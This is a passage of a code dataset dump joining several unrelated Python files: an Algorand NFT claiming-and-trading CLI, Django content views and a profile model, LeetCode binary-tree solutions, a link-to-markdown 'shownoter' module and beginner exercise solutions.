10 ** 6} ALGO...\\n\")\n try:\n gtxn_id = algod_client.send_transactions(signed_group)\n wait_for_confirmation(algod_client, gtxn_id)\n except AlgodHTTPError:\n quit(\"\\n☹️ Were you too stingy? Only generous hearts will rule over \"\n \"Algorand Realm!\\n️\")\n\n\ndef proof_asa_amount_eq_txn(\n algod_client: algod.AlgodClient,\n sender: Account,\n asa_id: int,\n asa_amount: int,\n):\n params = algod_client.suggested_params()\n\n proof_txn = transaction.ApplicationNoOpTxn(\n sender=sender.address,\n sp=params,\n index=ASA_STATE_OBSERVER_APP_ID,\n app_args=[\"AsaAmountEq\".encode(), asa_amount],\n foreign_assets=[asa_id],\n accounts=[sender.address],\n )\n return proof_txn\n\n\ndef claim_card(algod_client: algod.AlgodClient, claimer: Account):\n params = algod_client.suggested_params()\n\n proof_crown_ownership = proof_asa_amount_eq_txn(\n algod_client=algod_client,\n sender=claimer,\n asa_id=CROWN_ID,\n asa_amount=1,\n )\n\n proof_sceptre_ownership = proof_asa_amount_eq_txn(\n algod_client=algod_client,\n sender=claimer,\n asa_id=SCEPTRE_ID,\n asa_amount=1,\n )\n\n nft_card_xfer = transaction.AssetTransferTxn(\n sender=CARD_CONTRACT.address,\n sp=params,\n receiver=claimer.address,\n amt=1,\n index=CARD_ID,\n revocation_target=CARD_CONTRACT.address,\n )\n\n signed_group = group_and_sign(\n [claimer, claimer, CARD_CONTRACT],\n [proof_crown_ownership, proof_sceptre_ownership, nft_card_xfer],\n )\n\n try:\n gtxn_id = algod_client.send_transactions(signed_group)\n wait_for_confirmation(algod_client, gtxn_id)\n except AlgodHTTPError:\n quit(\"\\nOnly the generous heart of the Great Majesty of Algorand \"\n \"can break the spell!\\n\"\n \"Conquer both the 👑 Crown of Entropy and the 🪄 Sceptre \"\n \"of Proof first!\\n\")\n\n\ndef card_order(\n algod_client: algod.AlgodClient,\n buyer: Account,\n seller: Account,\n price: int,\n):\n params = algod_client.suggested_params()\n\n proof_crown_ownership = proof_asa_amount_eq_txn(\n algod_client=algod_client,\n sender=seller,\n asa_id=CROWN_ID,\n asa_amount=1,\n )\n\n proof_sceptre_ownership = proof_asa_amount_eq_txn(\n algod_client=algod_client,\n sender=seller,\n asa_id=SCEPTRE_ID,\n asa_amount=1,\n )\n\n nft_card_payment = transaction.PaymentTxn(\n sender=buyer.address,\n sp=params,\n receiver=seller.address,\n amt=price,\n )\n\n royalty_amount = math.ceil(price * ROYALTY_PERC / 100)\n\n royalty_1_payment = transaction.PaymentTxn(\n sender=seller.address,\n sp=params,\n receiver=ROYALTY_COLLECTOR_1.address,\n amt=royalty_amount,\n )\n\n royalty_2_payment = transaction.PaymentTxn(\n sender=seller.address,\n sp=params,\n receiver=ROYALTY_COLLECTOR_2.address,\n amt=royalty_amount,\n )\n\n nft_card_xfer = transaction.AssetTransferTxn(\n sender=CARD_CONTRACT.address,\n sp=params,\n receiver=buyer.address,\n amt=1,\n index=CARD_ID,\n revocation_target=seller.address,\n )\n\n trade_gtxn = [\n proof_crown_ownership,\n proof_sceptre_ownership,\n nft_card_payment,\n royalty_1_payment,\n royalty_2_payment,\n nft_card_xfer\n ]\n\n transaction.assign_group_id(trade_gtxn)\n signed_nft_card_payment = trade_gtxn[2].sign(buyer.private_key)\n trade_gtxn[2] = signed_nft_card_payment\n trade_gtxn[5] = transaction.LogicSigTransaction(trade_gtxn[5],\n CARD_CONTRACT.lsig)\n transaction.write_to_file(trade_gtxn, 'trade_raw.gtxn', overwrite=True)\n\n print(\n \"📝 Partially signed trade group transaction saved as: 'trade.gtxn'\\n\")\n\n return trade_gtxn\n\n\ndef notify(\n algod_client: algod.AlgodClient,\n user: Account,\n seller: Account,\n trade_gtxn: list\n):\n params = algod_client.suggested_params()\n\n note = {\n 'buy_order': 'AlgoRealm Special Card',\n 'asset_id': CARD_ID,\n 'algo_amount': trade_gtxn[2].transaction.amt / 10 ** 6,\n 'algo_royalty': (trade_gtxn[3].amt + trade_gtxn[4].amt) / 10 ** 6,\n 'last_valid_block': trade_gtxn[2].transaction.last_valid_round\n }\n\n bytes_note = msgpack.packb(note)\n\n notification_txn = transaction.PaymentTxn(\n sender=user.address,\n sp=params,\n receiver=seller.address,\n amt=0,\n note=bytes_note,\n )\n\n signed_txn = sign(user, notification_txn)\n tx_id = signed_txn.transaction.get_txid()\n print(\"✉️ Sending buy order notification to the Seller...\\n\")\n algod_client.send_transactions([signed_txn])\n wait_for_confirmation(algod_client, tx_id)\n print(\"\\n📄 Buy order notification:\\n\"\n \"https://mainnet.algoexplorer.io/tx/\" + tx_id)\n\n\ndef verify_buy_order(seller_address: str):\n trade_gtxn = transaction.retrieve_from_file('trade_raw.gtxn')\n\n # Check TXN 0: Crown Proof of Ownership\n try:\n assert trade_gtxn[0].type == 'appl'\n assert trade_gtxn[0].index == ASA_STATE_OBSERVER_APP_ID\n assert trade_gtxn[0].app_args[0] == b'AsaAmountEq'\n assert trade_gtxn[0].app_args[1] == b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01'\n assert trade_gtxn[0].foreign_assets[0] == CROWN_ID\n assert trade_gtxn[0].accounts[0] == seller_address\n assert trade_gtxn[0].sender == seller_address\n assert trade_gtxn[0].fee <= 1000\n assert trade_gtxn[0].rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 0 - Crown Proof of Ownership is invalid: {}\".format(\n text))\n\n # Check TXN 1: Sceptre Proof of Ownership\n try:\n assert trade_gtxn[1].type == 'appl'\n assert trade_gtxn[1].index == ASA_STATE_OBSERVER_APP_ID\n assert trade_gtxn[1].app_args[0] == b'AsaAmountEq'\n assert trade_gtxn[1].app_args[1] == b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01'\n assert trade_gtxn[1].foreign_assets[0] == SCEPTRE_ID\n assert trade_gtxn[1].accounts[0] == seller_address\n assert trade_gtxn[1].sender == seller_address\n assert trade_gtxn[1].fee <= 1000\n assert trade_gtxn[1].rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\n \"Transaction 1 - Sceptre Proof of Ownership is invalid: {}\".format(\n text))\n\n # Check TXN 2: Card Payment\n try:\n assert trade_gtxn[2].transaction.type == 'pay'\n assert trade_gtxn[2].transaction.receiver == seller_address\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 2 - Card Payment is invalid: {}\".format(text))\n\n # Check TXN 3: Royalty 1 Payment\n try:\n assert trade_gtxn[3].type == 'pay'\n assert trade_gtxn[3].sender == seller_address\n assert trade_gtxn[3].receiver == ROYALTY_COLLECTOR_1.address\n assert trade_gtxn[3].fee <= 1000\n assert trade_gtxn[3].rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 3 - Royalty 1 Payment is invalid: {}\".format(text))\n\n # Check TXN 4: Royalty 3 Payment\n try:\n assert trade_gtxn[4].type == 'pay'\n assert trade_gtxn[4].sender == seller_address\n assert trade_gtxn[4].receiver == ROYALTY_COLLECTOR_2.address\n assert trade_gtxn[4].fee <= 1000\n assert trade_gtxn[4].rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 4 - Royalty 2 Payment is invalid: {}\".format(text))\n\n # Check TXN 5: Card Transfer\n try:\n assert trade_gtxn[5].transaction.type == 'axfer'\n assert trade_gtxn[5].transaction.index == CARD_ID\n assert trade_gtxn[5].transaction.amount == 1\n assert trade_gtxn[5].transaction.sender == CARD_CONTRACT.address\n assert trade_gtxn[5].transaction.receiver == trade_gtxn[\n 2].transaction.sender\n assert trade_gtxn[5].transaction.revocation_target == seller_address\n assert trade_gtxn[5].transaction.fee <= 1000\n assert trade_gtxn[5].transaction.rekey_to is None\n except AssertionError:\n _, _, tb = sys.exc_info()\n tb_info = traceback.extract_tb(tb)\n filename, line, func, text = tb_info[-1]\n quit(\"Transaction 5 - Card Transfer is invalid: {}\".format(text))\n\n return trade_gtxn\n\n\ndef order_summary(trade_gtxn: list):\n return f\"\"\"\n * =========================== ORDER SUMMARY =========================== *\n\n BUYER:\\t{trade_gtxn[2].transaction.sender}\n SELLER:\\t{trade_gtxn[2].transaction.receiver}\n AMOUNT:\\t{trade_gtxn[2].transaction.amt / 10 ** 6} ALGO\n ROYALTY:\\t{(trade_gtxn[3].amt + trade_gtxn[4].amt) / 10 ** 6} ALGO\n\n LAST VALID BLOCK: {trade_gtxn[2].transaction.last_valid_round}\n\n * ===================================================================== *\n \"\"\"\n\n\ndef sell_card(algod_client: algod.AlgodClient, user: Account):\n trade_gtxn = transaction.retrieve_from_file('trade_raw.gtxn')\n\n signed_crown_proof = trade_gtxn[0].sign(user.private_key)\n signed_sceptre_proof = trade_gtxn[1].sign(user.private_key)\n signed_royalty_1 = trade_gtxn[3].sign(user.private_key)\n signed_royalty_2 = trade_gtxn[4].sign(user.private_key)\n\n trade_gtxn[0] = signed_crown_proof\n trade_gtxn[1] = signed_sceptre_proof\n trade_gtxn[3] = signed_royalty_1\n trade_gtxn[4] = signed_royalty_2\n\n print(f\"🤝 Selling the AlgoRealm Special Card for \"\n f\"{trade_gtxn[2].transaction.amt / 10 ** 6} ALGO:\\n\")\n try:\n gtxn_id = algod_client.send_transactions(trade_gtxn)\n except AlgodHTTPError:\n quit(\n \"You must hold the 👑 Crown and the 🪄 Scepter to sell the Card!\\n\")\n else:\n return wait_for_confirmation(algod_client, gtxn_id)\n\n\ndef title():\n return r\"\"\"\n __ __ ___ __ __ \n \\*) \\*) \\*/ (*/ (*/ \n \\*\\_\\*\\_|O|_/*/_/*/ \n \\_______________/ \n _ __ _______ __ \n / \\ [ | |_ __ \\ [ | \n / _ \\ | | .--./) .--. | |__) | .---. ,--. | | _ .--..--. \n / ___ \\ | | / /'`\\;/ .'`\\ \\ | __ / / /__\\\\`'_\\ : | | [ `.-. .-. | \n _/ / \\ \\_ | | \\ \\._//| \\__. |_| | \\ \\_| \\__.,// | |, | | | | | | | | \n |____| |____|[___].',__` '.__.'|____| |___|'.__.'\\'-;__/[___][___||__||__]\n ( ( __))\n by cusma \n \"\"\"\n\n\ndef poem():\n return r\"\"\"\n ,-----------------------------------------. \n (_\\ \\ \n | There was a time |\n | When nothing but Entropy was there. |\n | Then came the cryptographic Proof, |\n | And took it care. |\n | |\n | Verifiability of randomness, |\n | Since genesis block, |\n | Brings Consensus over realm vastness, |\n | So Algorand never fork. |\n _| |\n (_/___________________(*)___________________/\n \\\\ \n )) \n ^ \n \"\"\"\n\n\ndef main():\n if len(sys.argv) == 1:\n # Display help if no arguments, see:\n # https://github.com/docopt/docopt/issues/420#issuecomment-405018014\n sys.argv.append('--help')\n\n args = docopt(__doc__)\n\n print(title())\n\n if args['poem']:\n return print(poem())\n\n if args['verify-order']:\n return print(order_summary(verify_buy_order(args[''])))\n\n # Clients\n token = args['']\n header = {'X-Api-key': token}\n\n algod_client = algod.AlgodClient(\n algod_token=token,\n algod_address=ALGOD_ADDRESS,\n headers=header\n )\n\n indexer_client = indexer.IndexerClient(\n indexer_token=token,\n indexer_address=INDEXER_ADDRESS,\n headers=header\n )\n\n if args['dynasty']:\n print(\n r\"\"\"\n *** DYNASTY ***\n \"\"\"\n )\n return print(*['\\n', *history(indexer_client)])\n\n # Checking mnemonic format\n try:\n assert len(args[''].split()) == 25\n except AssertionError:\n quit('The mnemonic phrase must contain 25 words, '\n 'formatted as: \"word_1 word_2 ... word_25\"\\n')\n\n private_key = mnemonic.to_private_key(args[''])\n\n user = Account(\n account.address_from_private_key(private_key),\n private_key\n )\n\n if args['claim-crown']:\n opt_in(algod_client, user, CROWN_ID)\n\n name = args['']\n\n claim_nft(\n algod_client=algod_client,\n indexer_client=indexer_client,\n claimer=user,\n claim_arg='Crown',\n new_majesty=name,\n donation_amount=int(args['']),\n nft_id=CROWN_ID,\n )\n print(f\"\\n👑 Glory to {name}, the Randomic Majesty of Algorand! 🎉\\n\")\n\n elif args['claim-sceptre']:\n opt_in(algod_client, user, SCEPTRE_ID)\n\n name = args['']\n\n claim_nft(\n algod_client=algod_client,\n indexer_client=indexer_client,\n claimer=user,\n claim_arg='Sceptre',\n new_majesty=name,\n donation_amount=int(args['']),\n nft_id=SCEPTRE_ID,\n )\n print(\n f\"\\n🪄 Glory to {name}, the Verifiable Majesty of Algorand! 🎉\\n\")\n\n elif args['claim-card']:\n if algod_client.status()[\"last-round\"] <= ALGOREALM_CARD_FIRST_BLOCK:\n return print(\"🔐 The spell can be broken starting from the block \"\n f\"{ALGOREALM_CARD_FIRST_BLOCK}... ⏳\\n\")\n\n algorelm_card_contract = algod_client.account_info(\n CARD_CONTRACT.address\n )\n\n assets = algorelm_card_contract['assets']\n\n card_nft = list(filter(\n lambda asset: asset['asset-id'] == CARD_ID, assets))[0]\n\n if card_nft['amount'] == 0:\n return print(\"🔓 The enchanted coffer is empty! \"\n \"The AlgoRealm Special Card has been claimed!\\n\")\n\n opt_in(algod_client, user, CARD_ID)\n\n print(\"\\n✨ Whispering words of wisdom...\")\n claim_card(\n algod_client=algod_client,\n claimer=user\n )\n print(f\"\\n 📜 The spell has been broken! \"\n f\"The AlgoRealm Special Card is yours! 🎉\\n\")\n\n if args['buy-order']:\n opt_in(algod_client, user, CARD_ID)\n\n amount = int(args[''])\n\n print(\n f\"✏️ Placing order of: {util.microalgos_to_algos(amount)} ALGO\\n\")\n\n seller = Account(\n address=current_owner(indexer_client, CARD_ID),\n private_key=''\n )\n\n trade_gtxn = card_order(\n algod_client=algod_client,\n buyer=user,\n seller=seller,\n price=amount\n )\n\n if args['--msg']:\n notify(algod_client, user, seller, trade_gtxn)\n\n return print(\n \"\\n📦 Send `trade.gtxn` file to the Seller to finalize the trade!\\n\"\n )\n\n if args['sell-card']:\n sell_card(algod_client, user)\n\n else:\n quit(\"\\nError: read AlgoRealm '--help'!\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"algorealm.py","file_name":"algorealm.py","file_ext":"py","file_size_in_byte":28667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"188613445","text":"import json\n\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.utils.translation import check_for_language, activate\n\nfrom contents.forms import ImageForm\nfrom contents.models import TextContent, FrontPageImage\n\n\ndef landing(request):\n\n return render(request, 'contents/landing.html', {\"images\": FrontPageImage.objects.all()})\n\n\ndef set_language(request):\n next_page = request.GET.get('next', None)\n\n lang_code = request.GET.get('lang', None)\n\n if not next_page:\n next_page = '/'\n else:\n next_page = next_page[3:]\n\n if lang_code and check_for_language(lang_code):\n activate(lang_code)\n next_page = '/' + lang_code + next_page\n\n response = HttpResponseRedirect(next_page)\n return response\n\n\ndef text_content(request, url):\n content = get_object_or_404(TextContent, url=url)\n return render(request, 'contents/content.html', {'content': content})\n\n\n@login_required\ndef administration(request):\n\n return render(request, 'contents/administration.html', {'text_content': TextContent.objects.all()})\n\n\n@login_required\ndef upload_image(request):\n res = {'status': \"Default error\"}\n if request.method == 'POST':\n form = ImageForm(request.POST, request.FILES)\n if form.is_valid():\n ins = form.save()\n ins.refresh_from_db()\n res['status'] = \"ok\"\n res['url'] = ins.get_absolute_url()\n\n return HttpResponse(json.dumps(res))\n\n\n@login_required\ndef model_form_upload(request):\n if request.method == 'POST':\n form = ImageForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return render(request, 'contents/landing.html', {\"images\": FrontPageImage.objects.all()})\n else:\n form = ImageForm()\n return render(request, 'contents/model_form_upload.html', {\n 'form': form\n })","sub_path":"navitas/contents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"68299647","text":"# APPROACH 1: Intermediate solution\n# Time Complexity : O(n^2), n: number of nodes\n# Space Complexity : O(n^2), n: number of nodes\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. Current Root will always be the first element of the current preorder array.\n# 2. Find the index of the root in inorder -> to know the left and right subtree elements.\n# 3. Then recursively call the function with left and right subtree elements of both inorder and preorder\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n \n if len(preorder) == 0 or len(inorder) == 0:\n return None\n \n root_val = preorder[0]\n for ind in range(len(inorder)):\n if inorder[ind] == root_val:\n root_inorder_ind = ind\n \n preLeft = preorder[1 : root_inorder_ind + 1]\n preRight = preorder[root_inorder_ind + 1 : ]\n inLeft = inorder[ : root_inorder_ind]\n inRight = inorder[root_inorder_ind + 1 : ]\n \n root = TreeNode(root_val)\n root.left = self.buildTree(preLeft, inLeft)\n root.right = self.buildTree(preRight, inRight)\n \n return root\n\n\n\n\n\n# APPROACH 2: Optimal solution\n# Time Complexity : O(n), n: number of nodes\n# Space Complexity : O(n), n: number of nodes\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : None \n#\n#\n# Your code here along with comments explaining your approach\n# 1. Instead of searching the root in inorder list each time, build a hashmap that stores the element and it's position as key and value respectively.\n# 2. Instead of creating copies of array each time (left and right subtrees of preorder and inorder), maintain two pointers - start and end of inorder for current iteration.\n# 3. Preorder is used only for obtaining the root and we dont need to know the left and right subtree from it\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def __init__(self):\n self.root_preorder_ind = 0\n self.hashmap_inorder = {}\n \n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n \n if len(preorder) == 0 or len(inorder) == 0:\n return None\n \n for ind in range(len(inorder)):\n self.hashmap_inorder[inorder[ind]] = ind\n \n return self.helper(preorder, inorder, 0, len(inorder) - 1)\n \n \n def helper(self, preorder, inorder, start, end):\n if start > end:\n return\n \n root_inorder_ind = self.hashmap_inorder[preorder[self.root_preorder_ind]]\n self.root_preorder_ind += 1\n \n root = TreeNode(inorder[root_inorder_ind])\n root.left = self.helper(preorder, inorder, start, root_inorder_ind - 1)\n root.right = self.helper(preorder, inorder, root_inorder_ind + 1, end)\n \n return root\n","sub_path":"Problem-2_Construct_preorder_inorder.py","file_name":"Problem-2_Construct_preorder_inorder.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"114575130","text":"\"\"\"Accounts models for Twister project\"\"\"\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(\n to=User, \n on_delete=models.CASCADE, \n related_name='profile_user'\n )\n display_name = models.CharField('Name to display', max_length=15)\n avatar = models.ImageField(\n verbose_name='Avatar',\n upload_to='avatars',\n blank=True,\n default='avatars/placeholder.gif'\n )\n biography = models.CharField(\n verbose_name='Biography',\n max_length=100,\n blank=True,\n null=True\n )\n birthday = models.DateField('Birthday', blank=True, null=True)\n location = models.CharField('Location', max_length=15, blank=True, null=True)\n website = models.URLField('Website', blank=True, null=True)\n following = models.ManyToManyField(\n to=User, \n blank=True, \n related_name='profile_followers'\n )\n followers = models.ManyToManyField(\n to=User,\n blank=True,\n related_name='profile_following'\n )\n\n \n def __str__(self):\n return f'{ self.display_name }'\n","sub_path":"twister/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9183213","text":"\"\"\" The shownoter module contains the core Shownoter functionality \"\"\"\n\nimport re\nimport requests\n\nfrom bs4 import BeautifulSoup\nfrom markdown import markdown\n\n\ndef format_links_as_hash(source):\n\n urls = link_detect(source)\n links = []\n\n for url in urls:\n url = url.lower()\n valid_link = True\n\n if image_detect(url):\n link = Image(url)\n\n else:\n link = Link()\n\n try:\n link.collect_data(url)\n except ValueError:\n valid_link = False\n continue\n\n if valid_link:\n entry = {\n 'url':link.url,\n 'title':link.title,\n 'markdown':link.markdown}\n links.append(entry)\n\n return links\n\ndef format_links_as_markdown(source):\n \"\"\" Wraps the shownoter functionality in a single function call \"\"\"\n urls = link_detect(source)\n links = []\n\n for url in urls:\n if image_detect(url):\n link = Image(url)\n else:\n link = Link()\n link.collect_data(url)\n\n links.append(link.markdown)\n\n output = links_to_string(links)\n return output.strip()\n\ndef link_detect(site):\n \"\"\" Returns a list of urls from a string\"\"\"\n re_link = re.compile(r'\\b\\S+\\.[a-zA-Z]{2,}\\S*', re.M)\n links = []\n\n for link in re.findall(re_link, site):\n \n if link not in links:\n links.append(link)\n \n return links\n\ndef get(link):\n \"\"\" A wrapper around requests.get to allow for easy mocking \"\"\"\n return requests.get(link, timeout=1.5, allow_redirects=False)\n\ndef image_detect(url):\n \"\"\"\n Determines is a string is an image.\n Returns true if it is an image.\n \"\"\"\n image_extension = ['.jpg', '.png', '.jpeg', '.gif']\n extension = re.search(r'\\.[a-zA-Z]{2,}$', url, re.M)\n\n if extension == None:\n return False\n\n if extension.group(0) in image_extension:\n return True\n\n return False\n\ndef parse_title(content, default_title=\"\"):\n \"\"\"Parses the title of a site from it's content\"\"\"\n if content == None:\n return default_title\n\n soup = BeautifulSoup(content, 'html.parser')\n if soup == None or soup.title == None:\n return default_title\n\n return soup.title.text\n\ndef link_markdown(title, url):\n \"\"\"Formats a generic link to a markdown list item link\"\"\"\n return '* [{}]({})'.format(title, url)\n\ndef image_markdown(title, url):\n \"\"\"Formats a link as an image\"\"\"\n return '* ![{}]({})'.format(title, url)\n\ndef request_content(site):\n \"\"\" Returns content or raises ValueError \"\"\"\n success = True\n\n try:\n request = get(site)\n except:\n # TODO insert some logging here requests.ConnectionError (or other) being trapped.\n raise ValueError(\"Url not found\")\n\n if request.status_code == 200:\n return request\n else:\n # TODO insert some logging here\n pass\n\n raise ValueError(\"Url not found\")\n\ndef possible_urls(url):\n \"\"\" Generator that returns possible variations of a given url \"\"\"\n if re.search(r'^\\w{3,5}://', url):\n yield url\n else:\n prefixes = ['http://', 'https://', 'http://www.', 'https://www.']\n\n for prefix in prefixes:\n yield prefix+url\n\n\ndef valid_link(site):\n \"\"\"Returns the content of a website from a url\n\n If the first request fails it will attempt variations\n\n If all variations fail a ValueError is raised\"\"\"\n for url in possible_urls(site):\n try:\n return request_content(url)\n except ValueError:\n continue\n\n raise ValueError(\"No valid link permutation found\")\n\nclass Link():\n def collect_data(self, site):\n \"\"\" Collects the various information about the link \"\"\"\n self.site = valid_link(site)\n self.url = self.site.url\n self.title = parse_title(self.site.content) or site\n self.markdown = link_markdown(self.title, self.url)\n\n\nclass Image():\n \"\"\"Images are like links except they ignore connectivity tests.\"\"\"\n title = ''\n\n def __init__(self, site):\n self.url = site\n self.markdown = image_markdown(self.title, self.url)\n\ndef links_to_string(links):\n \"\"\"This function takes a list of objects and returns it as a string\"\"\"\n\n links_string = ''\n for link in links:\n links_string += link + '\\n'\n return links_string\n","sub_path":"app/shownoter.py","file_name":"shownoter.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116983688","text":"import math\nfrom operator import itemgetter\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q1 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef solve_ribuit(a, b, c):\n \"\"\"\n solve_ribuit(a, b, c):\n Solves the quadratic equation\n :param a: float, the X^2 coefficient\n :param b: float, the X coefficient\n :param c: float, the constant\n :return : tuple (first solve, second solve) or None if there is no real solve to the equation\n test 1: solve_ribuit(1, 5, 6) -> (-2.0, -3.0)\n test 2: solve_ribuit(1, 4, 5) -> None\n \"\"\"\n d = b ** 2 - 4 * a * c\n if d < 0:\n return None\n\n solve1 = (-b + math.sqrt(d)) / (2 * a)\n solve2 = (-b - math.sqrt(d)) / (2 * a)\n return solve1, solve2\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q2 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef str_start_end_same(s, n):\n \"\"\"\n str_start_end_same(s, n):\n Checks that the first n characters of the string are equals to the n last characters\n :param s: str, The string\n :param n: int, The start and end length\n :return: True iff the string is starts and end with the exact same n characters\n test 1: str_start_end_same('abcdab', 2) -> True\n test 2: str_start_end_same('abcdab', 3) -> False\n \"\"\"\n return s[0:n] == s[-n:]\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q3 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef get_ribua_num(a, b):\n \"\"\"\n get_ribua_num(a, b):\n Calculated the value of the [a,b] cell\n :param a: Row\n :param b: Column\n :returns Number: The calculated value of the [a,b] cell\n test 1: get_ribua_num(1,1) -> 1\n test 2: get_ribua_num(3,3) -> 6\n test 3: get_ribua_num(3,5) -> 15\n \"\"\"\n return 1 if a == 1 or b == 1 else get_ribua_num(a - 1, b) + get_ribua_num(a, b - 1)\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q4 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef how_is_string(s):\n \"\"\"\n how_is_string(s):\n :param s: str, the string\n :return: 1 if the string contains only characters which are letters or numbers,\n 2 if all the characters are numbers,\n 3 if all the characters are letters,\n else 0\n test 1: how_is_string('asd213%') -> 0\n test 2: how_is_string('asd213') -> 1\n test 3: how_is_string('213') -> 2\n test 4: how_is_string('abcdef') -> 3\n \"\"\"\n digit_found, letter_found = False, False\n\n if not s.isalnum():\n return 0\n\n for char in s:\n if char.isdigit():\n digit_found = True\n if char.isalpha():\n letter_found = True\n\n if digit_found and letter_found:\n return 1\n elif digit_found:\n return 2\n else:\n return 3\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q5 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef str_only_letters(s):\n \"\"\"\n str_only_letters(s):\n Returns the same string without any character that is not a letter\n :param s: str, The original string\n :return: The string without any non-characters letters\n test 1: str_only_letters('this is a nice string ( ‘hhhhh’ ), but we want it with only letters') -> 'thisisanicestringhhhhhbutwewantitwithonlyletters'\n test 2: str_only_letters('avielasaf') -> 'avielasaf'\n \"\"\"\n output = \"\"\n for c in s:\n output += c if c.isalpha() else \"\"\n return output\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q6 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\ninvalid_chars = {',', '.', '(', ')', '/', '-', \"'\"}\ninvalid_words = {\"and\", \"or\", \"the\", \"to\", \"of\", \"not\", \"in\", \"for\", \"while\", \"if\", \"as\", \"equal\", \"a\", \"c\", \"it\", \"is\",\n \"are\", \"an\", \"also\", \"with\"}\n\n\ndef clear_chars(string, chars):\n for char in chars:\n if char in string:\n string = string.replace(char, ' ')\n return string\n\n\ndef get_top_used_words_from_file(sFile, n):\n \"\"\"\n get_top_used_words_from_file(sFile, n):\n Returns the top used words from file\n :param sFile: The path to the file\n :param n: Top n words to return\n :return: Returns the top used words from file\n test 1: get_top_used_words_from_file(\"textfile.txt\", 3) -> [('python', 14), ('language', 6), ('interpreter', 4)]\n test 2: get_top_used_words_from_file(\"textfile.txt\", 2) -> [('python', 14), ('language', 6)]\n \"\"\"\n word_dict = {}\n with open(sFile, 'r') as f:\n for line in f:\n line = clear_chars(line, invalid_chars)\n for word in line.lower().split():\n if word not in invalid_words: word_dict[word] = word_dict.get(word, 0) + 1\n sorted_items = sorted(word_dict.items(), key=itemgetter(1), reverse=True)\n print(sorted_items[:n])\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q7 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\ns_females = {1, 2, 3, 4, 11, 12}\ns_males = {5, 6, 7, 8}\ns_all = s_females.union(s_males)\ns_natives = {3, 11, 7, 5}\ns_telaviv = {1, 2, 5, 6}\ns_haifa = {3, 7, 8, 11}\ns_jerusalem = s_all.difference(s_telaviv.union(s_haifa))\ns_not_tel_aviv = s_all.difference(s_telaviv)\ns_males_telaviv = s_males.intersection(s_telaviv)\ns_females_telaviv_or_Haifa = s_females.intersection(s_telaviv.union(s_haifa))\ns_are_males_in_Jerusalem = len(s_jerusalem.intersection(s_males)) > 0\ns_are_females_not_natives_in_Jerusalem = len(s_females.difference(s_natives).intersection(s_jerusalem)) > 0\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q8 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef _calc(n1, n2, operator):\n if operator not in {\"+\", \"*\", \"-\", \"/\"}:\n raise TypeError(\"Expected +, /, - or * but got \" + operator)\n return eval(str(n2) + operator + str(n1))\n\n\ndef eval_post_fix(s):\n \"\"\"\n eval_post_fix(s):\n Evaluate the expression value\n :param s: str, The post fix expression\n :return: The value of the expression or None if the input was incorrect\n test 1: eval_post_fix(\"3 4 + 9 5 - *\") -> 28\n test 2: eval_post_fix(\"3 4 + 9 5 - ^\") -> Expected +, /, - or * but got ^ At char number 7\n test 3: eval_post_fix(\"3 4 + 9 5 - 4\") -> Invalid input\n \"\"\"\n stack = []\n for 